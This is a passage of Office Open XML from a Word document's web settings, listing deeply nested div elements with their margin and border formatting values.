              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="737482924">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1411392305">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="2076967695">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="645204859">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="564687087">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="13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10877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="291789555">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="308480822">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="93206659">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="519199407">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1214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4377">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="962689924">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="548418425">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="203686326">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="6108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92904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="832843569">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="10177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7207">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1249463302">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="385758527">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="23988645">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="15460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409232545">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="436677012">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="392899140">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="16312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10862">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1252082853">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1281381617">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="983242906">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="735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4907">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1499420752">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="584458481">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="986713890">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="763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2046">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1679428539">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="26181020">
              <w:marLeft w:val="3360"/>
              <w:marRight w:val="4080"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1139802896">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1542127621">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="10048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5509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1271595499">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1809276129">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="742408479">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="4863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6789">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1772626306">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="847673979">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="859319010">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="890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9979">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="442922283">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1619951255">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="267392878">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1919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3779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1432386079">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1881355950">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="184445932">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="762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10786">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="500002621">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1909683569">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1167746528">
                  <w:marLeft w:val="-7245"/>
                  <w:marRight w:val="-7245"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2054454219">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="329021154">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
